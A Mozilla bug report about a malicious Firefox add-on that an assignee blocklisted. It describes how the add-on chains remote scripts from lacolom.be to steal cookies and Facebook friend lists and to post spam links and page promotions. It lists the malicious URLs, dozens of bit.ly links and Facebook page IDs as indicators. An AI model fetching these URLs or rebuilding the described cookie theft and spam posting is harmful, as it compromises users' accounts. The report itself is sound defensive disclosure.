Malicious "Firefox Essentials" add-on

RESOLVED FIXED

Status

()

Toolkit
Blocklisting
RESOLVED FIXED
6 years ago
a year ago

People

(Reporter: MarkH, Assigned: jorgev)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

80.69 KB, application/octet-stream
Details
(Reporter)

Description

6 years ago
Created attachment 594822 [details]
20120206 youtube3.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7

Steps to reproduce:

Downloaded add-on from http://lacolom[.]be/fbs.xpi


Actual results:

The add-on injects JS to inject http://lacolom.be/g.js, which injects http://www.lacolom.be/oepp.php as JS.

oepp.php:

Steals your cookies
Steals you friend list via /ajax/typeahead/first_degree.php

Picks one of the following bit.ly URLs:

http://bit.ly/A54fuM
http://bit.ly/A5BioE
http://bit.ly/A61qQj
http://bit.ly/AkDIFP
http://bit.ly/AqZ0Om
http://bit.ly/wAANlt
http://bit.ly/wPYUpe
http://bit.ly/wfRFEa
http://bit.ly/wjuuaZ
http://bit.ly/x4ig0a
http://bit.ly/x7cnJj
http://bit.ly/x90Fc6
http://bit.ly/xCjMIo
http://bit.ly/xKMbLH
http://bit.ly/xL31ch
http://bit.ly/xf7vnN
http://bit.ly/xuWFKm
http://bit.ly/y4eAYc
http://bit.ly/yDGIoi
http://bit.ly/yFZ9eM
http://bit.ly/yQbCxV
http://bit.ly/yoVZbq
http://bit.ly/ytvSEJ
http://bit.ly/z48I3i
http://bit.ly/zEB37d
http://bit.ly/zOo8me
http://bit.ly/zkg07u

Posts it as a status update via /ajax/updatestatus.php, and mentions your friends.

Picks one of he following bit.ly URLs:
http://bit.ly/A4uCl8
http://bit.ly/A5ixGO
http://bit.ly/AESbVg
http://bit.ly/AhONYc
http://bit.ly/AiCvpH
http://bit.ly/wJDMu7
http://bit.ly/wNcTf6
http://bit.ly/wRokAK
http://bit.ly/wYaljt
http://bit.ly/wfRFEa
http://bit.ly/wjrfV3
http://bit.ly/wk4NBy
http://bit.ly/wmEBss
http://bit.ly/wum0Ui
http://bit.ly/wvjyrp
http://bit.ly/x6ERiI
http://bit.ly/xPfRQs
http://bit.ly/xj3Fsb
http://bit.ly/xzpzvJ
http://bit.ly/y1BfN5
http://bit.ly/y7zJKt
http://bit.ly/yQe6r7
http://bit.ly/yc8K1n
http://bit.ly/ycQxii
http://bit.ly/ylhBqc
http://bit.ly/zt6Wgw
http://bit.ly/zw7uy2

Posts it as an update to your timeline via /ajax/ufi/modify.php

Picks one of the following FB pages:
221128464647487
227499167340992
232493100172345
266988576702848
296308197093558
316095231773903
318315724872330
330406740337729
336886886352146
362134143796905

and has you post about it via /ajax/ufi/modify.php.



Expected results:

It shouldn't steal your cookies and post to Facebook on your behalf without your consent.
(Assignee)

Comment 1

6 years ago
ID: youtube@youtuber.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
(Assignee)

Comment 2

6 years ago
https://addons.mozilla.org/en-US/firefox/blocked/i63
Status: ASSIGNED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.